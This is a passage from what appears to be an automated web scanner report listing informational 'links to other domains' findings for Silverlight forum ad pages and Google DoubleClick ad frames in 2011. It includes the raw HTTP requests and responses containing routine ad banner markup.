Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/13.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:58 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:59 GMT
Content-Length: 399


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=679&AdvertiserID=12&BannerID=589&SiteID=6&RandomNumber=470325631&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2011_q1_728x90.gif" width="728" height="90" alt="Advertising - Aspose" align="Center" border="0"></a>
...[SNIP]...

23.259. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:54 GMT
Content-Length: 391


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=719&AdvertiserID=51&BannerID=475&SiteID=6&RandomNumber=1904855093&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/ClientUI%20ad5%20(728x90).jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.260. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/TopicsNotAnswered.aspx?ForumID=-1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:03 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:05 GMT
Content-Length: 408


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=683&AdvertiserID=80&BannerID=590&SiteID=6&RandomNumber=2036515960&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/728X90-OnlineNMG1c.gif" width="728" height="90" alt="Advertising - CBT Direct" align="Center" border="0"></a>
...[SNIP]...

23.261. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/17.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:00 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:02 GMT
Content-Length: 408


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=683&AdvertiserID=80&BannerID=590&SiteID=6&RandomNumber=2050564355&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/728X90-OnlineNMG1c.gif" width="728" height="90" alt="Advertising - CBT Direct" align="Center" border="0"></a>
...[SNIP]...

23.262. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=48&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/13.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:58 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:00 GMT
Content-Length: 402


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=680&AdvertiserID=12&BannerID=588&SiteID=6&RandomNumber=2104650241&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2011_q1_300x250.gif" width="300" height="250" alt="Advertising - Aspose" align="Center" border="0"></a>
...[SNIP]...

23.263. http://forums.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=45&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/default.aspx%2526ot%253DA; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:54 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:55 GMT
Content-Length: 380


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=717&AdvertiserID=59&BannerID=506&SiteID=6&RandomNumber=216444598&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/1_AR%20300x250.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.264. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/TopicsNotAnswered.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:00 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:05 GMT; expires=Mon, 23-Apr-2012 15:57:05 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:17:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:05 GMT
Content-Length: 73491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Thread
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
<a href="http://msdn.microsoft.com/"><img class="logo_msdn" alt="MSDN" src="http://i1.silverlight.net/resources/images/content/misc/header_logo_msdn.png?cdn_id=12152010">
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere_top.png?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</iframe>
<a class="link_advertise" href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise Here</a>
...[SNIP]...
</iframe><a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight"><img src="http://i1.silverlight.net/resources/images/content/misc/placeholder_advertisehere.jpg?cdn_id=12152010" alt="Advertise Here" />
...[SNIP]...
</a> &#124; <a href="http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight">Advertise with us</a>
...[SNIP]...
<div class="footer_img_links">
<a href="http://www.asp.net" title="ASP.net"><img src="http://i1.silverlight.net/resources/images/content/misc/aspnet.png?cdn_id=12152010" alt="ASP.net" />
...[SNIP]...
</a>
<a href="http://channel9.msdn.com" title="Channel 9"> <img src="http://i1.silverlight.net/resources/images/content/misc/channel9.png?cdn_id=12152010" alt="Channel 9" /></a>
<a href="http://edge.technet.com/" title="Edge Technet"> <img src="http://i1.silverlight.net/resources/images/content/misc/technet.png?cdn_id=12152010" alt="Edge Technet" /></a>
<a href="http://www.iis.net" title="IIS"><img src="http://i1.silverlight.net/resources/images/content/misc/iis.png?cdn_id=12152010" alt="IIS" /></a>
<a href="http://visitmix.com/" title="MIX"><img src="http://i2.silverlight.net/resources/images/content/misc/mix.png?cdn_id=12152010" alt="MIX" /></a>
<a href="http://www.msdn.com" title="MSDN"><img src="http://i3.silverlight.net/resources/images/content/misc/msdn.png?cdn_id=12152010" alt="MSDN" /></a>
<a href="http://www.windowsclient.net" title="Windows Client"> <img src="http://i3.silverlight.net/resources/images/content/misc/windows_client.png?cdn_id=12152010" alt="WindowsClient" />
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://msstonojsslvnet.112.2O7.net/b/ss/msstonojsslvnet/1/H.20.2--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

23.265. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502295&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502306&frm=1&adk=2614322350&ga_vid=880493158.1303658502&ga_sid=1303658502&ga_hid=2002983713&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1369

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.266. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680719&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662719275&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662719280&frm=1&adk=2614322350&ga_vid=1662752031.1303662719&ga_sid=1303662719&ga_hid=848972560&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:31:56 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15170

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dtripplite.com/RackSolutions%26adT%3DOpen%2BFrame%2BRacks%26adU%3Dwww.sparco.com%26adT%3DComplete%2BIBM%2BSolutions%26gl%3DUS&amp;usg=AFQjCNGY0Y3lIKceYpGYLljj1qFjtBqTJA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.267. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679449&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661449281&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303661449285&frm=1&adk=2614322350&ga_vid=141939128.1303661449&ga_sid=1303661449&ga_hid=306711676&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=6 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:10:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.AmazonServices.com/ProductAds%26adT%3DAmazon%2BProduct%2BAds%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3Dwww.Fool.com%26adT%3DMotley%2BFool%2BStock%2BAdvisor%26gl%3DUS&amp;usg=AFQjCNGMr-z2zYmlL9qazx3VIuhOEfqKSQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.268. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680754&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662754006&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662754012&frm=1&adk=2614322350&ga_vid=1392795204.1303662754&ga_sid=1303662754&ga_hid=293622663&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
